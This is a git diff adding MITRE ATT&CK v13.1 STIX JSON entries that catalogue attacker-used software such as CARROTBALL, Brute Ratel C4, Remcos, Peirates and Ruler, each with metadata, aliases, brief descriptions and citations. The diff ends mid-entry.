0000000000000000000000000000000000000000..b0e9e090c0fbc07f2d554a02381774728533cc2f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--5fc81b43-62b5-41b1-9113-c79ae5f030c4.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--64c9572e-1b2d-40af-ae24-542235aac2e5", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "CARROTBALL" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--5fc81b43-62b5-41b1-9113-c79ae5f030c4", + "type": "tool", + "created": "2020-06-02T19:10:29.513Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0465", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0465" + }, + { + "source_name": "Unit 42 CARROTBAT January 2020", + "url": "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/", + "description": "McCabe, A. (2020, January 23). The Fractured Statue Campaign: U.S. Government Agency Targeted in Spear-Phishing Attacks. Retrieved June 2, 2020." + } + ], + "modified": "2020-06-10T14:44:23.055Z", + "name": "CARROTBALL", + "description": "[CARROTBALL](https://attack.mitre.org/software/S0465) is an FTP downloader utility that has been in use since at least 2019. [CARROTBALL](https://attack.mitre.org/software/S0465) has been used as a downloader to install [SYSCON](https://attack.mitre.org/software/S0464).(Citation: Unit 42 CARROTBAT January 2020)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--64764dc6-a032-495f-8250-1e4c06bdc163.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--64764dc6-a032-495f-8250-1e4c06bdc163.json new file mode 100644 index 0000000000000000000000000000000000000000..eb044121736520837e4ee358fa04d6f8158b21b0 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--64764dc6-a032-495f-8250-1e4c06bdc163.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--1a8b4651-484f-4895-a68b-766ec3986769", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-13T18:56:28.568Z", + "name": "BITSAdmin", + "description": "[BITSAdmin](https://attack.mitre.org/software/S0190) is a command line tool used to create and manage [BITS Jobs](https://attack.mitre.org/techniques/T1197). (Citation: Microsoft BITSAdmin)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.3", + "x_mitre_contributors": [ + "Edward Millington" + ], + "x_mitre_aliases": [ + "BITSAdmin" + ], + "type": "tool", + "id": "tool--64764dc6-a032-495f-8250-1e4c06bdc163", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0190", + "external_id": "S0190" + }, + { + "source_name": "Microsoft BITSAdmin", + "description": "Microsoft. (n.d.). BITSAdmin Tool. Retrieved January 12, 2018.", + "url": "https://msdn.microsoft.com/library/aa362813.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--65370d0b-3bd4-4653-8cf9-daf56f6be830.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--65370d0b-3bd4-4653-8cf9-daf56f6be830.json new file mode 100644 index 0000000000000000000000000000000000000000..5fc6e0a087ccd5842cbb99adba525258f67919e2 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--65370d0b-3bd4-4653-8cf9-daf56f6be830.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--06c360af-f00a-4b19-810b-84d1a9f5c704", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "meek" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--65370d0b-3bd4-4653-8cf9-daf56f6be830", + "type": "tool", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0175", + "external_id": "S0175" + } + ], + "modified": "2021-02-09T23:00:38.683Z", + "name": "meek", + "description": "[meek](https://attack.mitre.org/software/S0175) is an open-source Tor plugin that tunnels Tor traffic through HTTPS connections.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--6dbdc657-d8e0-4f2f-909b-7251b3e72c6d.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--6dbdc657-d8e0-4f2f-909b-7251b3e72c6d.json new file mode 100644 index 0000000000000000000000000000000000000000..e72a39a4b7bb038ccbbdcad1289e51420107c827 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--6dbdc657-d8e0-4f2f-909b-7251b3e72c6d.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--f86c7f34-c8eb-4ba9-8432-fec3347de592", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "ROADTools" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--6dbdc657-d8e0-4f2f-909b-7251b3e72c6d", + "type": "tool", + "created": "2022-02-18T13:29:23.577Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0684", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0684" + }, + { + "source_name": "ROADtools Github", + "url": "https://github.com/dirkjanm/ROADtools", + "description": "Dirk-jan Mollema. (2022, January 31). ROADtools. Retrieved January 31, 2022." + } + ], + "modified": "2022-04-01T13:27:48.378Z", + "name": "ROADTools", + "description": "[ROADTools](https://attack.mitre.org/software/S0684) is a framework for enumerating Azure Active Directory environments. The tool is written in Python and publicly available on GitHub.(Citation: ROADtools Github)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--75d8b521-6b6a-42ff-8af3-d97e20ce12a5.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--75d8b521-6b6a-42ff-8af3-d97e20ce12a5.json new file mode 100644 index 0000000000000000000000000000000000000000..91f6b3c0d4b94aad2e9d373b6a5bee6d85162a0d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--75d8b521-6b6a-42ff-8af3-d97e20ce12a5.json @@ -0,0 +1,77 @@ +{ + "type": "bundle", + "id": "bundle--156be571-2633-44f1-a11a-b50432e7bbab", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-17T21:44:03.462Z", + "name": "Brute Ratel C4", + "description": "[Brute Ratel C4](https://attack.mitre.org/software/S1063) is a commercial red-teaming and adversarial attack simulation tool that first appeared in December 2020. [Brute Ratel C4](https://attack.mitre.org/software/S1063) was specifically designed to avoid detection by endpoint detection and response (EDR) and antivirus (AV) capabilities, and deploys agents called badgers to enable arbitrary command execution for lateral movement, privilege escalation, and persistence. In September 2022, a cracked version of [Brute Ratel C4](https://attack.mitre.org/software/S1063) was leaked in the cybercriminal underground, leading to its use by threat actors.(Citation: Dark Vortex Brute Ratel C4)(Citation: Palo Alto Brute Ratel July 2022)(Citation: MDSec Brute Ratel August 2022)(Citation: SANS Brute Ratel October 2022)(Citation: Trend Micro Black Basta October 2022)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Sittikorn Sangrattanapitak", + "Daniel Acevedo, @darmad0, ARMADO" + ], + "x_mitre_aliases": [ + "Brute Ratel C4", + "BRc4" + ], + "type": "tool", + "id": "tool--75d8b521-6b6a-42ff-8af3-d97e20ce12a5", + "created": "2023-02-07T20:26:58.792Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1063", + "external_id": "S1063" + }, + { + "source_name": "BRc4", + "description": "(Citation: Palo Alto Brute Ratel July 2022)" + }, + { + "source_name": "MDSec Brute Ratel August 2022", + "description": "Chell, D. PART 3: How I Met Your Beacon \u2013 Brute Ratel. Retrieved February 6, 2023.", + "url": "https://www.mdsec.co.uk/2022/08/part-3-how-i-met-your-beacon-brute-ratel/" + }, + { + "source_name": "Dark Vortex Brute Ratel C4", + "description": "Dark Vortex. (n.d.). A Customized Command and Control Center for Red Team and Adversary Simulation. Retrieved February 7, 2023.", + "url": "https://bruteratel.com/" + }, + { + "source_name": "Palo Alto Brute Ratel July 2022", + "description": "Harbison, M. and Renals, P. (2022, July 5). When Pentest Tools Go Brutal: Red-Teaming Tool Being Abused by Malicious Actors. Retrieved February 1, 2023.", + "url": "https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/" + }, + { + "source_name": "Trend Micro Black Basta October 2022", + "description": "Kenefick, I. et al. (2022, October 12). Black Basta Ransomware Gang Infiltrates Networks via QAKBOT, Brute Ratel, and Cobalt Strike. Retrieved February 6, 2023.", + "url": "https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html" + }, + { + "source_name": "SANS Brute Ratel October 2022", + "description": "Thomas, W. (2022, October 5). Cracked Brute Ratel C4 framework proliferates across the cybercriminal underground. Retrieved February 6, 2023.", + "url": "https://www.sans.org/blog/cracked-brute-ratel-c4-framework-proliferates-across-the-cybercriminal-underground/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--79dd477a-8226-4b3d-ad15-28623675f221.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--79dd477a-8226-4b3d-ad15-28623675f221.json new file mode 100644 index 0000000000000000000000000000000000000000..8334f4a79796c9aca7eb4a3b7cc2723b855619d1 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--79dd477a-8226-4b3d-ad15-28623675f221.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--33b9e21c-ed53-49de-822f-8548ff2c8f53", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Containers" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Peirates" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "tool", + "id": "tool--79dd477a-8226-4b3d-ad15-28623675f221", + "created": "2022-02-08T16:11:38.528Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0683", + "url": "https://attack.mitre.org/software/S0683" + }, + { + "source_name": "Peirates GitHub", + "url": "https://github.com/inguardians/peirates", + "description": "InGuardians. (2022, January 5). Peirates GitHub. Retrieved February 8, 2022." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Peirates](https://attack.mitre.org/software/S0683) is a post-exploitation Kubernetes exploitation framework with a focus on gathering service account tokens for lateral movement and privilege escalation. The tool is written in GoLang and publicly available on GitHub.(Citation: Peirates GitHub)", + "modified": "2022-04-14T20:55:21.371Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Peirates", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--7cd0bc75-055b-4098-a00e-83dc8beaff14.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--7cd0bc75-055b-4098-a00e-83dc8beaff14.json new file mode 100644 index 0000000000000000000000000000000000000000..4c9769a59753c56cae162329ceac53ecf5a10fa2 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--7cd0bc75-055b-4098-a00e-83dc8beaff14.json @@ -0,0 +1,62 @@ +{ + "type": "bundle", + "id": "bundle--021f78d3-72c3-4aa8-bbc9-8c2637757a86", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-12-23T14:07:20.658Z", + "name": "Remcos", + "description": "[Remcos](https://attack.mitre.org/software/S0332) is a closed-source tool that is marketed as a remote control and surveillance software by a company called Breaking Security. [Remcos](https://attack.mitre.org/software/S0332) has been observed being used in malware campaigns.(Citation: Riskiq Remcos Jan 2018)(Citation: Talos Remcos Aug 2018)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.3", + "x_mitre_aliases": [ + "Remcos" + ], + "type": "tool", + "id": "tool--7cd0bc75-055b-4098-a00e-83dc8beaff14", + "created": "2019-01-29T18:55:20.245Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0332", + "external_id": "S0332" + }, + { + "source_name": "Remcos", + "description": "(Citation: Riskiq Remcos Jan 2018)(Citation: Fortinet Remcos Feb 2017)(Citation: Talos Remcos Aug 2018)" + }, + { + "source_name": "Fortinet Remcos Feb 2017", + "description": "Bacurio, F., Salvio, J. (2017, February 14). REMCOS: A New RAT In The Wild. Retrieved November 6, 2018.", + "url": "https://www.fortinet.com/blog/threat-research/remcos-a-new-rat-in-the-wild-2.html" + }, + { + "source_name": "Talos Remcos Aug 2018", + "description": "Brumaghin, E., Unterbrink, H. (2018, August 22). Picking Apart Remcos Botnet-In-A-Box. Retrieved November 6, 2018.", + "url": "https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html" + }, + { + "source_name": "Riskiq Remcos Jan 2018", + "description": "Klijnsma, Y. (2018, January 23). Espionage Campaign Leverages Spear Phishing, RATs Against Turkish Defense Contractors. Retrieved November 6, 2018.", + "url": "https://web.archive.org/web/20180124082756/https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--7fcbc4e8-1989-441f-9ac5-e7b6ff5806f1.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--7fcbc4e8-1989-441f-9ac5-e7b6ff5806f1.json new file mode 100644 index 0000000000000000000000000000000000000000..77d33a1e9516ba5971768f9e98c2afb7072c1e0d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--7fcbc4e8-1989-441f-9ac5-e7b6ff5806f1.json @@ -0,0 +1,45 @@ +{ + "type": "bundle", + "id": "bundle--1922b57c-3ebb-40e4-b7d1-0f126cf2571d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-07T13:03:30.781Z", + "name": "Systeminfo", + "description": "[Systeminfo](https://attack.mitre.org/software/S0096) is a Windows utility that can be used to gather detailed information about a computer. (Citation: TechNet Systeminfo)", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_aliases": [ + "Systeminfo" + ], + "type": "tool", + "id": "tool--7fcbc4e8-1989-441f-9ac5-e7b6ff5806f1", + "created": "2017-05-31T21:33:00.969Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0096", + "external_id": "S0096" + }, + { + "source_name": "TechNet Systeminfo", + "description": "Microsoft. (n.d.). Systeminfo. Retrieved April 8, 2016.", + "url": "https://technet.microsoft.com/en-us/library/bb491007.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--80c815bb-b24a-4b9c-9d73-ff4c075a278d.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--80c815bb-b24a-4b9c-9d73-ff4c075a278d.json new file mode 100644 index 0000000000000000000000000000000000000000..22e179716bcd552aed4429bce943ebeb5fcbefa2 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--80c815bb-b24a-4b9c-9d73-ff4c075a278d.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--0a6cc4ba-8a49-4df1-9af1-d58bf3211ca0", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Out1" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--80c815bb-b24a-4b9c-9d73-ff4c075a278d", + "type": "tool", + "created": "2021-03-19T13:11:50.666Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0594", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0594" + }, + { + "source_name": "Trend Micro Muddy Water March 2021", + "url": "https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html", + "description": "Peretz, A. and Theck, E. (2021, March 5). Earth Vetala \u2013 MuddyWater Continues to Target Organizations in the Middle East. Retrieved March 18, 2021." + } + ], + "modified": "2021-04-26T22:35:19.315Z", + "name": "Out1", + "description": "[Out1](https://attack.mitre.org/software/S0594) is a remote access tool written in python and used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least 2021.(Citation: Trend Micro Muddy Water March 2021)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--842976c7-f9c8-41b2-8371-41dc64fbe261.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--842976c7-f9c8-41b2-8371-41dc64fbe261.json new file mode 100644 index 0000000000000000000000000000000000000000..de91f3f83ee1d8d36e56e05e0c141757c2f81aa3 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--842976c7-f9c8-41b2-8371-41dc64fbe261.json @@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--ab742e17-0de5-43cb-9efc-9be3726b33ee", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-13T13:09:38.786Z", + "name": "ConnectWise", + "description": "[ConnectWise](https://attack.mitre.org/software/S0591) is a legitimate remote administration tool that has been used since at least 2016 by threat actors including [MuddyWater](https://attack.mitre.org/groups/G0069) and [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) to connect to and conduct lateral movement in target environments.(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "ConnectWise", + "ScreenConnect" + ], + "type": "tool", + "id": "tool--842976c7-f9c8-41b2-8371-41dc64fbe261", + "created": "2021-03-18T13:39:27.676Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0591", + "external_id": "S0591" + }, + { + "source_name": "ScreenConnect", + "description": "(Citation: Anomali Static Kitten February 2021)" + }, + { + "source_name": "Anomali Static Kitten February 2021", + "description": "Mele, G. et al. (2021, February 10). Probable Iranian Cyber Actors, Static Kitten, Conducting Cyberespionage Campaign Targeting UAE and Kuwait Government Agencies. Retrieved March 17, 2021.", + "url": "https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies" + }, + { + "source_name": "Trend Micro Muddy Water March 2021", + "description": "Peretz, A. and Theck, E. (2021, March 5). Earth Vetala \u2013 MuddyWater Continues to Target Organizations in the Middle East. Retrieved March 18, 2021.", + "url": "https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9.json new file mode 100644 index 0000000000000000000000000000000000000000..6048437c525367ff3cba6a9567d5c5277a35af41 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--3632d7b3-006d-4999-afc1-b486b3a5433e", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Jose Luis S\u00e1nchez Martinez" + ], + "x_mitre_aliases": [ + "Imminent Monitor" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9", + "type": "tool", + "created": "2020-05-05T18:45:36.358Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0434", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0434" + }, + { + "source_name": "Imminent Unit42 Dec2019", + "url": "https://unit42.paloaltonetworks.com/imminent-monitor-a-rat-down-under/", + "description": "Unit 42. (2019, December 2). Imminent Monitor \u2013 a RAT Down Under. Retrieved May 5, 2020." + } + ], + "modified": "2020-07-10T13:39:26.417Z", + "name": "Imminent Monitor", + "description": "[Imminent Monitor](https://attack.mitre.org/software/S0434) was a commodity remote access tool (RAT) offered for sale from 2012 until 2019, when an operation was conducted to take down the Imminent Monitor infrastructure. Various cracked versions and variations of this RAT are still in circulation.(Citation: Imminent Unit42 Dec2019)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--90ac9266-68ce-46f2-b24f-5eb3b2a8ea38.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--90ac9266-68ce-46f2-b24f-5eb3b2a8ea38.json new file mode 100644 index 0000000000000000000000000000000000000000..1b7a4dbe1091c30137f1b444ce786a4c3fb5e14a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--90ac9266-68ce-46f2-b24f-5eb3b2a8ea38.json @@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--8d7531ed-81bb-43e8-8c96-145c579aacaf", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows", + "Office 365" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Ruler" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--90ac9266-68ce-46f2-b24f-5eb3b2a8ea38", + "type": "tool", + "created": "2019-02-04T18:27:00.501Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0358", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0358" + }, + { + "source_name": "SensePost Ruler GitHub", + "url": "https://github.com/sensepost/ruler", + "description": "SensePost. (2016, August 18). Ruler: A tool to abuse Exchange services. Retrieved February 4, 2019." + }, + { + "source_name": "SensePost NotRuler", + "url": "https://github.com/sensepost/notruler", + "description": "SensePost. (2017, September 21). NotRuler - The opposite of Ruler, provides blue teams with the ability to detect Ruler usage against Exchange. Retrieved February 4, 2019." + } + ], + "modified": "2020-06-22T21:31:54.771Z", + "name": "Ruler", + "description": "[Ruler](https://attack.mitre.org/software/S0358) is a tool to abuse Microsoft Exchange services. It is publicly available on GitHub and the tool is executed via the command line. The creators of [Ruler](https://attack.mitre.org/software/S0358) have also released a defensive tool, NotRuler, to detect its usage.(Citation: SensePost Ruler GitHub)(Citation: SensePost NotRuler)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--90ec2b22-7061-4469-b539-0989ec4f96c2.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--90ec2b22-7061-4469-b539-0989ec4f96c2.json new file mode 100644 index 0000000000000000000000000000000000000000..c30c70a8b54049a0ffa212d3e6ffd7ac72360740 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--90ec2b22-7061-4469-b539-0989ec4f96c2.json @@ -0,0 +1,40 @@ +{ + "type": "bundle", + "id": "bundle--fad7dbc7-fca7-4afc-9265-a9734d347d96", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--90ec2b22-7061-4469-b539-0989ec4f96c2", + "type": "tool", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0193", + "external_id": "S0193" + }, + { + "source_name": "Microsoft Forfiles Aug 2016", + "description": "Microsoft. (2016, August 31). Forfiles. Retrieved January 22, 2018.", + "url": "https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc753551(v=ws.11)" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "Forfiles", + "description": "[Forfiles](https://attack.mitre.org/software/S0193) is a Windows utility commonly used in batch jobs to execute commands on one or more selected files or directories (ex: list all directories in a drive, read the first line of all files created yesterday, etc.). Forfiles can be executed from either the command line, Run window, or batch files/scripts. (Citation: Microsoft Forfiles Aug 2016)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--96fd6cc4-a693-4118-83ec-619e5352d07d.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--96fd6cc4-a693-4118-83ec-619e5352d07d.json new file mode 100644 index 0000000000000000000000000000000000000000..1cd18fe2f450bd41d907cceb6bcbb0b6d4df6417 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--96fd6cc4-a693-4118-83ec-619e5352d07d.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": 